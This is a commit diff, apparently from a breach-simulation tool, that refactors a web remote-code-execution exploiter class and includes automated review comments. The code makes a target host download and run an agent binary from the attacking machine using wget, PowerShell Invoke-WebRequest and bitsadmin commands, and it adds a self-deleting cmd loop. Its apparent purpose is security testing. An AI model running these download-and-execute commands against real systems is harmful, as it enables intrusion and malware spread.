Final, tested framework fixes
parent
5232d84e06
commit
0d45a44d6b
|
@ -107,7 +107,6 @@ class WebRCE(HostExploiter):
|
||||||
else:
|
else:
|
||||||
extensions = [""]
|
extensions = [""]
|
||||||
for port in ports:
|
for port in ports:
|
||||||
extensions = [(e[1:] if '/' == e[0] else e) for e in extensions]
|
|
||||||
for extension in extensions:
|
for extension in extensions:
|
||||||
if port[1]:
|
if port[1]:
|
||||||
protocol = "https"
|
protocol = "https"
|
||||||
|
@ -127,9 +126,12 @@ class WebRCE(HostExploiter):
|
||||||
resp = self.exploit(url, ARCH_LINUX)
|
resp = self.exploit(url, ARCH_LINUX)
|
||||||
if resp:
|
if resp:
|
||||||
# Pulls architecture string
|
# Pulls architecture string
|
||||||
# TODO TEST IF NOT FOUND
|
|
||||||
arch = re.search('(?<=Architecture:)\s+(\w+)', resp)
|
arch = re.search('(?<=Architecture:)\s+(\w+)', resp)
|
||||||
arch = arch.group(1)
|
try:
|
||||||
|
arch = arch.group(1)
|
||||||
|
except AttributeError:
|
||||||
|
LOG.error("Looked for linux architecture but could not find it")
|
||||||
|
return False
|
||||||
if arch:
|
if arch:
|
||||||
return arch
|
return arch
|
||||||
else:
|
else:
|
||||||
|
@ -167,7 +169,7 @@ class WebRCE(HostExploiter):
|
||||||
else:
|
else:
|
||||||
paths.extend([self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_64])
|
paths.extend([self._config.dropper_target_path_win_32, self._config.dropper_target_path_win_64])
|
||||||
for path in paths:
|
for path in paths:
|
||||||
if self.check_remote_file(url, path):
|
if self.check_remote_monkey_file(url, path):
|
||||||
return True
|
return True
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
@ -179,15 +181,15 @@ class WebRCE(HostExploiter):
|
||||||
:param names: [] of service names. Example: ["http"]
|
:param names: [] of service names. Example: ["http"]
|
||||||
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
|
:return: Array of ports: [[80, False], [443, True]] or False. Port always consists of [ port.nr, IsHTTPS?]
|
||||||
"""
|
"""
|
||||||
ports = WebRCE.get_open_service_ports(self.host, ports, names)
|
ports = self.get_open_service_ports(ports, names)
|
||||||
if not ports:
|
if not ports:
|
||||||
LOG.info("All default web ports are closed on %r, skipping", host)
|
LOG.info("All default web ports are closed on %r, skipping", host)
|
||||||
return False
|
return False
|
||||||
else:
|
else:
|
||||||
return ports
|
return ports
|
||||||
|
|
||||||
def set_host_arch(self, exploiter, url):
|
def set_host_arch(self, url):
|
||||||
arch = WebRCE.get_host_arch(exploiter, url)
|
arch = self.get_host_arch(url)
|
||||||
if not arch:
|
if not arch:
|
||||||
LOG.error("Couldn't get host machine's architecture")
|
LOG.error("Couldn't get host machine's architecture")
|
||||||
return False
|
return False
|
||||||
|
@ -203,7 +205,7 @@ class WebRCE(HostExploiter):
|
||||||
:return: {'response': response/False, 'path': monkeys_path_in_host}
|
:return: {'response': response/False, 'path': monkeys_path_in_host}
|
||||||
"""
|
"""
|
||||||
LOG.info("Trying to upload monkey to the host.")
|
LOG.info("Trying to upload monkey to the host.")
|
||||||
src_path = get_target_monkey(host)
|
src_path = get_target_monkey(self.host)
|
||||||
if not src_path:
|
if not src_path:
|
||||||
LOG.info("Can't find suitable monkey executable for host %r", host)
|
LOG.info("Can't find suitable monkey executable for host %r", host)
|
||||||
return False
|
return False
|
||||||
|
@ -213,7 +215,7 @@ class WebRCE(HostExploiter):
|
||||||
if not path:
|
if not path:
|
||||||
return False
|
return False
|
||||||
# Create server for http download and wait for it's startup.
|
# Create server for http download and wait for it's startup.
|
||||||
http_path, http_thread = HTTPTools.create_locked_transfer(host, src_path)
|
http_path, http_thread = HTTPTools.create_locked_transfer(self.host, src_path)
|
||||||
if not http_path:
|
if not http_path:
|
||||||
LOG.debug("Exploiter failed, http transfer creation failed.")
|
LOG.debug("Exploiter failed, http transfer creation failed.")
|
||||||
return False
|
return False
|
||||||
|
@ -223,10 +225,9 @@ class WebRCE(HostExploiter):
|
||||||
return False
|
return False
|
||||||
# Choose command:
|
# Choose command:
|
||||||
if commands:
|
if commands:
|
||||||
command = WebRCE.get_command(self.host, path, http_path, commands)
|
command = self.get_command(path, http_path, commands)
|
||||||
else:
|
else:
|
||||||
command = WebRCE.get_command(self.host, path, http_path,
|
command = self.get_command(path, http_path, {'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
|
||||||
{'windows': POWERSHELL_HTTP_UPLOAD, 'linux': WGET_HTTP_UPLOAD})
|
|
||||||
|
|
||||||
resp = self.exploit(url, command)
|
resp = self.exploit(url, command)
|
||||||
|
|
||||||
|
@ -283,10 +284,10 @@ class WebRCE(HostExploiter):
|
||||||
LOG.info("Trying to execute remote monkey")
|
LOG.info("Trying to execute remote monkey")
|
||||||
# Get monkey command line
|
# Get monkey command line
|
||||||
if dropper and path:
|
if dropper and path:
|
||||||
monkey_cmd = build_monkey_commandline(host, get_monkey_depth() - 1, path)
|
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1, path)
|
||||||
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
|
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': DROPPER_ARG, 'parameters': monkey_cmd}
|
||||||
else:
|
else:
|
||||||
monkey_cmd = build_monkey_commandline(host, get_monkey_depth() - 1)
|
monkey_cmd = build_monkey_commandline(self.host, get_monkey_depth() - 1)
|
||||||
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd}
|
command = RUN_MONKEY % {'monkey_path': path, 'monkey_type': MONKEY_ARG, 'parameters': monkey_cmd}
|
||||||
try:
|
try:
|
||||||
resp = self.exploit(url, command)
|
resp = self.exploit(url, command)
|
||||||
|
@ -306,6 +307,3 @@ class WebRCE(HostExploiter):
|
||||||
return False
|
return False
|
||||||
LOG.info("Execution attempt finished")
|
LOG.info("Execution attempt finished")
|
||||||
return resp
|
return resp
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
|
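Review bot: In hunk `@ -179,15 +181,15`, `LOG.info("All default web ports are closed on %r, skipping", host)` still reads a bare `host` even though the call on the line above was changed to `self.get_open_service_ports(ports, names)`; the method signature is outside the hunk, but if this refactor dropped the `host` parameter (as the `self.host` substitutions in `@ -203,7 +205,7`, `@ -213,7 +215,7` and `@ -283,10 +284,10` suggest), that line raises `NameError` on exactly the closed-ports path it is meant to report, and `LOG.info("Can't find suitable monkey executable for host %r", host)` in `@ -203,7 +205,7` has the same problem. Change both to the attribute, e.g. `LOG.info("All default web ports are closed on %r, skipping", self.host)`. Separately, in `@ -127,9 +126,12` the new `try`/`except AttributeError` around `arch.group(1)` is an indirect None-check; an explicit `if arch is None:` before the `.group(1)` call states the intent directly and does not swallow unrelated `AttributeError`s. The pattern on the preceding context line should also be a raw string, `arch = re.search(r'(?<=Architecture:)\s+(\w+)', resp)`, so `\s` and `\w` are not parsed as string escapes.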
@ -17,8 +17,7 @@ RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObje
|
||||||
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1'
|
||||||
|
|
||||||
# Commands used for downloading monkeys
|
# Commands used for downloading monkeys
|
||||||
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%(http_path)s\\\' -OutFile \\\'%(monkey_path)s\\\' -UseBasicParsing\""
|
POWERSHELL_HTTP_UPLOAD = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
||||||
POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \'%(http_path)s\' -OutFile \'%(monkey_path)s\' -UseBasicParsing\""
|
|
||||||
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
WGET_HTTP_UPLOAD = "wget -O %(monkey_path)s %(http_path)s"
|
||||||
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
|
||||||
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
CHMOD_MONKEY = "chmod +x %(monkey_path)s"
|
||||||
|
|
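Review bot: In the new `POWERSHELL_HTTP_UPLOAD` line, `\'` is a redundant escape inside a double-quoted Python literal; `-Uri '%(http_path)s' -OutFile '%(monkey_path)s'` yields the identical string and no longer resembles the `\\\'` form it replaces, which is what a reader will otherwise look for. Since `POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED` is removed in the same hunk, any module that still imports that name fails at import time; the diff shown does not include such a caller, so this is only worth a grep before merging. A short comment above the constant would also help, e.g. `# Both %-fields land inside PowerShell single quotes; the substituted values must not contain a single quote.`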